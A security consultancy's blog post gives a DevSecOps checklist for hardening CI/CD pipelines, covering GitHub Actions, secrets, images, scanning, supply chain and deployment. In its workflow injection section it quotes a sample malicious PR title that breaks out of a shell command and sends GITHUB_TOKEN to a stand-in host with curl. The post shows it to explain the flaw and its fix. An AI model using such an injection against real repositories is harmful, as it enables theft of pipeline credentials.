Securing Your CI/CD Pipeline: The DevSecOps Checklist for Engineering Teams | Lorikeet Security Skip to main content
Back to Blog

Securing Your CI/CD Pipeline: The DevSecOps Checklist for Engineering Teams

Lorikeet Security Team February 21, 2026 10 min read

Your CI/CD pipeline is probably the most privileged system in your entire infrastructure. It has access to production credentials, deployment keys, cloud provider tokens, container registries, and the ability to push code directly to your customers. It runs with more access than any individual developer on your team. And in most organizations, it is one of the least secured components in the stack.

Attackers know this. The SolarWinds breach started with a compromised build pipeline. The Codecov incident exposed secrets from thousands of CI environments. The ua-parser-js and event-stream supply chain attacks weaponized the automated trust that pipelines place in upstream dependencies. These were not hypothetical scenarios or CTF challenges. They were production incidents that affected millions of users.

The problem is not that engineering teams are negligent. It is that CI/CD security falls into a gap between responsibilities. Developers own the pipeline configuration but think of it as a build tool, not a security boundary. Security teams audit the application code but rarely look at the .github/workflows/ directory or the Terraform modules that provision the pipeline infrastructure. The result is a high-value target that nobody is actively defending.

This article is the checklist we wish every engineering team had before their first production deployment. It covers the full attack surface of a modern CI/CD pipeline, from secret management to supply chain integrity, with specific, actionable guidance you can implement this week.


Why CI/CD pipelines are high-value targets

To understand why pipeline security matters, you need to think about what your CI/CD system actually has access to. In a typical setup, the pipeline can:

A compromised pipeline is not just a build system issue. It is a direct path to production, to customer data, and to every secret your application depends on. An attacker who gains control of your CI/CD pipeline effectively has the combined access of every service account, deployment key, and production credential that the pipeline uses.

The asymmetry is the problem. A developer laptop compromise gives an attacker access to whatever that developer can reach. A pipeline compromise gives the attacker access to everything the pipeline can reach, which in most organizations is everything in production. This is why pipeline security is not a "nice to have" -it is the single highest-leverage security investment most engineering teams can make.


Common CI/CD security failures

Before we get to the checklist, let us catalog the most common ways pipelines get compromised. These are not theoretical attacks. Every one of these patterns has been exploited in real-world incidents affecting real companies.

Secrets exposed in logs

  • Build logs contain environment variables, command outputs, or debug information that includes credentials
  • Secret masking is not enabled or does not cover all secret formats
  • Error messages from failed API calls include authentication headers or tokens in plaintext
  • Build artifacts or test reports are stored with embedded credentials

Overprivileged service accounts

  • Pipeline service accounts have full admin access to cloud providers instead of scoped IAM roles
  • A single set of credentials is shared across all pipeline stages (build, test, deploy to staging, deploy to production)
  • Service accounts are never rotated and have no expiration policy
  • The same token that runs unit tests can also push to production

Unsigned and unverified artifacts

  • Container images are built and deployed without content trust or signature verification
  • No chain of custody exists between what was built and what was deployed
  • An attacker who compromises the artifact registry can replace a legitimate image with a malicious one
  • Build provenance is not recorded, making incident response nearly impossible

Dependency confusion

  • Internal package names are not reserved on public registries, allowing an attacker to publish a malicious package with the same name
  • Package managers resolve public packages before private ones by default
  • Lockfiles are not committed or are not enforced during CI builds
  • No integrity checks (checksums, signatures) on downloaded dependencies

If any of these sound familiar, you are not alone. In our experience conducting secure code reviews, at least three of these four patterns are present in the majority of CI/CD configurations we examine. The good news is that every one of them is fixable with the right configuration and practices.


GitHub Actions security

GitHub Actions is the most widely used CI/CD platform for modern software teams, and it has its own unique attack surface that deserves dedicated attention. The convenience features that make Actions easy to use are often the same features that create security vulnerabilities.

Workflow injection attacks

The most dangerous class of GitHub Actions vulnerabilities is workflow injection. This occurs when untrusted data from a pull request, issue, or comment is interpolated directly into a workflow using the ${{ }} expression syntax.

# VULNERABLE: Attacker-controlled PR title is injected into a shell command
- name: Print PR title
  run: echo "PR: ${{ github.event.pull_request.title }}"

# An attacker can set their PR title to:
# "; curl https://evil.com/steal?token=$GITHUB_TOKEN #
# which breaks out of the echo and exfiltrates the token

The fix is to never interpolate untrusted expressions directly into run: blocks. Instead, pass them through environment variables, which are not subject to shell injection:

# SAFE: PR title is passed as an environment variable
- name: Print PR title
  run: echo "PR: $PR_TITLE"
  env:
    PR_TITLE: ${{ github.event.pull_request.title }}

This applies to any GitHub context value that can be influenced by an external contributor: github.event.pull_request.title, github.event.pull_request.body, github.event.issue.title, github.event.comment.body, github.head_ref, and branch names in general.

GITHUB_TOKEN permissions

By default, the GITHUB_TOKEN in a workflow has broad read/write permissions across the repository. This is far more access than most workflows need. Restrict it at the workflow level:

permissions:
  contents: read
  pull-requests: write
  # Only grant the specific permissions this workflow needs
  # Never use permissions: write-all

You should also enable the organization-level setting that restricts the default GITHUB_TOKEN to read-only. This forces every workflow to explicitly declare the permissions it needs, following the principle of least privilege.

Third-party action risks

Every uses: directive in a GitHub Actions workflow is a trust decision. When you reference actions/checkout@v4, you are running code from a third-party repository inside your pipeline with full access to your repository secrets and GITHUB_TOKEN. Common mistakes include:

The mitigation is to pin every action to a specific commit SHA, not a tag or branch:

# VULNERABLE: Mutable tag can be changed by the action maintainer
uses: actions/checkout@v4

# SAFE: Pinned to immutable commit SHA
uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1

Tools like Dependabot and Renovate can automatically create pull requests to update these SHA pins when new versions are released, so you get both security and convenience.


Secret management in pipelines

Secrets are the crown jewels of your CI/CD pipeline, and they are frequently mismanaged. The goal is simple: secrets should be available to the pipeline stages that need them, invisible to everything else, and rotated frequently enough that a compromised secret has a limited blast radius.

What not to do

Vault integration

The gold standard for pipeline secret management is a dedicated secrets vault (HashiCorp Vault, AWS Secrets Manager, Google Secret Manager, or Azure Key Vault) with short-lived, dynamically generated credentials. Instead of storing a long-lived database password in your CI platform, the pipeline requests a temporary credential from the vault at the start of each run. That credential expires automatically, typically within minutes or hours.

This approach provides several advantages:

Secret rotation

Every secret used by your pipeline should have a defined rotation schedule. For most credentials, 90 days is the maximum acceptable lifetime. For high-value secrets (production database credentials, signing keys, cloud provider root tokens), 30 days or less is appropriate. Ideally, secrets should be ephemeral: generated at the start of a pipeline run and destroyed at the end.

Automate rotation wherever possible. Manual rotation is a policy that will be ignored under deadline pressure. Automated rotation through your vault or cloud provider's native rotation features ensures it actually happens.


Container image security in build pipelines

If your pipeline builds and deploys container images, the image build process is a critical security boundary. A compromised or misconfigured image build can introduce vulnerabilities that bypass every other security control in your stack.

Base image selection and maintenance

Image scanning in the pipeline

Integrate a container image scanner (Trivy, Grype, Snyk Container, or similar) into your pipeline that runs after the image build and before the image push. The scan should:

Image signing and verification

Use Cosign (from the Sigstore project) or Docker Content Trust to sign every image your pipeline produces. Then configure your deployment targets (Kubernetes admission controllers, ECS task definitions, etc.) to reject unsigned or incorrectly signed images. This creates a chain of trust: only images built by your pipeline can be deployed to your infrastructure.

# Sign the image after building
cosign sign --key cosign.key $IMAGE_REGISTRY/$IMAGE_NAME:$TAG

# Verify the signature before deploying
cosign verify --key cosign.pub $IMAGE_REGISTRY/$IMAGE_NAME:$TAG

SAST, DAST, and SCA integration points

A mature DevSecOps pipeline integrates multiple categories of security testing at the right points in the development lifecycle. The key is knowing what each tool type does and where it belongs.

Tool Type What It Tests Where in the Pipeline Limitations
SAST Source code for known vulnerability patterns, insecure API usage, and taint flows On every pull request, before merge. Block merge on critical findings. High false positive rates. Cannot detect logic flaws, business logic bypasses, or authorization issues.
SCA Dependencies for known CVEs, license violations, and end-of-life packages On every pull request and on a scheduled nightly scan of the default branch. Only finds known vulnerabilities with assigned CVEs. Zero-day and unreported vulnerabilities are invisible.
DAST Running application for injection flaws, misconfigurations, and authentication issues from an external perspective After deployment to a staging or QA environment. Run against a full application stack. Slow. Cannot test all code paths. Requires a running application. Best used as a complement to SAST, not a replacement.
Secret Scanning Code, configuration, and commit history for accidentally committed credentials Pre-commit hook (developer machine) and post-commit CI check. Both. Pattern-based detection. Custom or non-standard secret formats may be missed. Historical secrets in git history need separate tools.
IaC Scanning Terraform, CloudFormation, Kubernetes manifests for misconfigurations On every pull request that modifies infrastructure code. Block merge on high-severity findings. Cannot detect runtime drift. Configuration may be correct in code but overridden manually in the cloud console.

The critical mistake teams make is running all these tools but not acting on the results. A SAST scanner that produces 500 findings that nobody triages is worse than having no scanner at all, because it creates a false sense of security. Start with one tool per category, tune it to eliminate false positives, and enforce a policy that findings must be triaged within a defined SLA. As we covered in our secure code review guide, automated scanning is a complement to manual review, not a replacement for it.


Supply chain security

Your application is not just the code your team writes. It is your code plus every dependency, transitive dependency, build tool, base image, and third-party integration that your pipeline pulls in. Supply chain attacks target these trust relationships, and they are becoming more common every year.

Verifying dependencies

SBOM generation

A Software Bill of Materials (SBOM) is an inventory of every component in your application, including versions, licenses, and provenance information. Generate an SBOM as part of your pipeline and store it alongside every release artifact. When the next Log4Shell-scale vulnerability drops, you will be able to determine within minutes whether your application is affected, instead of scrambling to audit every service manually.

Tools like Syft, Trivy, and CycloneDX can generate SBOMs in standard formats (SPDX, CycloneDX) directly from your container images or application manifests. Store them in a registry alongside the artifact they describe, and integrate them with your vulnerability management platform for continuous monitoring. For more on managing your software supply chain risks, see our dedicated guide.


Infrastructure as Code scanning

If your pipeline deploys infrastructure changes through Terraform, CloudFormation, Pulumi, or Kubernetes manifests, those configuration files are part of your security surface. A misconfigured S3 bucket policy or an overprivileged IAM role defined in Terraform is just as dangerous as a SQL injection in your application code.

Common IaC misconfigurations

Integrating IaC scanning

Tools like Checkov, tfsec, KICS, and Bridgecrew scan your infrastructure code for these misconfigurations before they reach your cloud environment. Integrate them into your pipeline so that:

  1. Every pull request that modifies *.tf, *.yaml (Kubernetes/CloudFormation), or other IaC files triggers a scan
  2. High and critical severity findings block the merge
  3. Medium and low findings are tracked as technical debt with a defined remediation timeline
  4. Custom policies enforce your organization-specific requirements (e.g., "all resources must have cost allocation tags" or "all databases must use customer-managed encryption keys")

The shift-left principle applies here just as it does to application security. Catching a misconfigured security group in a pull request is orders of magnitude cheaper than discovering it after an attacker has already used it to access your database.


Branch protection and code review enforcement

Your pipeline is only as secure as the process that governs what code enters it. Without proper branch protection, a single compromised developer account can push malicious code directly to the main branch and trigger a production deployment with no review.

Minimum branch protection rules

Pipeline configuration as code is code. Your .github/workflows/, Jenkinsfile, .gitlab-ci.yml, and Dockerfile should be subject to the same review requirements as your application code. A change to the deployment pipeline is at least as impactful as a change to any application endpoint. Require code owner approval for all pipeline configuration changes.


Deployment security

The final stage of the pipeline - getting code from a build artifact to a production environment - is where many security controls are either enforced or bypassed. A secure deployment process ensures that only tested, reviewed, and authorized changes reach production.

Immutable artifacts

Once an artifact (container image, compiled binary, bundled application) passes your CI checks, it should be stored in an immutable artifact registry and deployed without modification. The exact artifact that was tested is the exact artifact that gets deployed. No rebuilding, no recompiling, no "quick patches" applied between staging and production.

This principle eliminates an entire class of attacks where the build output is modified between the test phase and the deployment phase. Tag your artifacts with the git commit SHA they were built from, sign them, and verify the signature at deployment time.

Approval gates

Production deployments should require explicit approval from authorized team members. This is not about slowing down deployments. It is about ensuring that a compromised CI system or a rogue automation cannot push code to production without a human in the loop. Modern CI/CD platforms support environment-level approvals:

The approval should include a review of what is actually being deployed: the commit range, the changelog, the test results, and the security scan outputs. An approval gate that rubber-stamps every deployment provides no value.

Rollback capability

Secure deployments include the ability to quickly roll back to a known-good state. If a deployment introduces a security vulnerability (or if a compromised artifact makes it past your controls), the time to detect and revert is the primary factor in limiting blast radius. Ensure your deployment process supports:


Monitoring and alerting for pipeline anomalies

Prevention is essential, but detection is the safety net. Even with every control in this checklist implemented, you need visibility into anomalous pipeline behavior that could indicate a compromise in progress.

What to monitor

Centralized pipeline logging

Send all pipeline logs to a centralized, append-only logging system that is separate from the pipeline itself. If an attacker compromises your CI system, they should not be able to delete or modify the logs that would reveal the compromise. Use a SIEM or log aggregation platform (Datadog, Splunk, Elastic, or even a dedicated S3 bucket with object lock) to store and analyze pipeline audit data.


The DevSecOps maturity roadmap

Implementing everything in this article at once is not realistic for most teams. Security is a journey, not a destination. Here is a practical maturity roadmap that prioritizes the highest-impact controls first and builds toward a comprehensive DevSecOps practice over time.

1 Foundation (Week 1-2)

Enable branch protection rules on your default branch. Require pull requests, at least one review, and passing status checks. Move all secrets from pipeline configuration files to your CI platform's secret storage. Enable secret masking in build logs. Pin third-party actions to commit SHAs.

2 Automated Scanning (Week 3-4)

Add SCA scanning (Dependabot, Snyk, or Renovate) to flag known vulnerabilities in dependencies. Add a secret scanner (GitLeaks, TruffleHog) as a pre-commit hook and CI check. Commit and enforce lockfiles. Configure your package manager to use --frozen-lockfile or npm ci in CI.

3 Pipeline Hardening (Month 2)

Restrict GITHUB_TOKEN permissions to the minimum required per workflow. Implement least-privilege service accounts with separate credentials per environment. Add container image scanning if you deploy containers. Set up IaC scanning for infrastructure code. Require signed commits from all contributors.

4 Advanced Controls (Month 3)

Integrate a secrets vault for dynamic, short-lived credentials. Implement image signing and verification with Cosign. Add SAST scanning to pull request checks. Set up deployment approval gates for production environments. Generate and store SBOMs with every release.

5 Continuous Improvement (Ongoing)

Add DAST scanning against staging environments. Implement canary deployments with automated rollback. Set up centralized pipeline logging and anomaly detection. Conduct regular pipeline security audits. Establish a secret rotation schedule and automate it. Run tabletop exercises simulating pipeline compromise scenarios.

Each stage builds on the previous one. Do not skip ahead to image signing before you have branch protection and secret management in place. The foundations matter more than the advanced controls, because they address the most common and most easily exploited attack vectors.


Putting it into practice

CI/CD pipeline security is not a separate discipline from application security. It is the foundation that everything else builds on. The most thoroughly reviewed application code in the world is meaningless if an attacker can modify it during the build process, inject malicious dependencies, steal deployment credentials, or push a compromised artifact directly to production.

Start with the foundation: branch protection, secret management, and dependency integrity. Then layer on automated scanning, image security, and deployment controls. Finally, add monitoring and detection to catch what prevention misses. The roadmap above gives you a realistic timeline, but the most important step is the first one.

If you are not sure where your pipeline stands, a security code review that includes pipeline configuration analysis will identify the gaps and give you a prioritized remediation plan. The vulnerabilities in your CI/CD system are not hypothetical risks. They are the attack vectors that sophisticated adversaries are actively exploiting, and the window between "we should fix that" and "we just got breached" is shorter than most teams realize.

Need help securing your pipeline and codebase?

Our security engineers review your CI/CD configuration, pipeline code, and deployment architecture alongside your application source code. We identify the vulnerabilities that automated tools miss and deliver a prioritized remediation plan your team can act on immediately.

-- views
Link copied!
Lorikeet Security

Lorikeet Security Team

Penetration Testing & Cybersecurity Consulting

We've completed 170+ security engagements across web apps, APIs, cloud infrastructure, and AI-generated codebases. Everything we publish here comes from patterns we see in real client work.

Lory waving

Hi, I'm Lory! Need help finding the right service? Click to chat!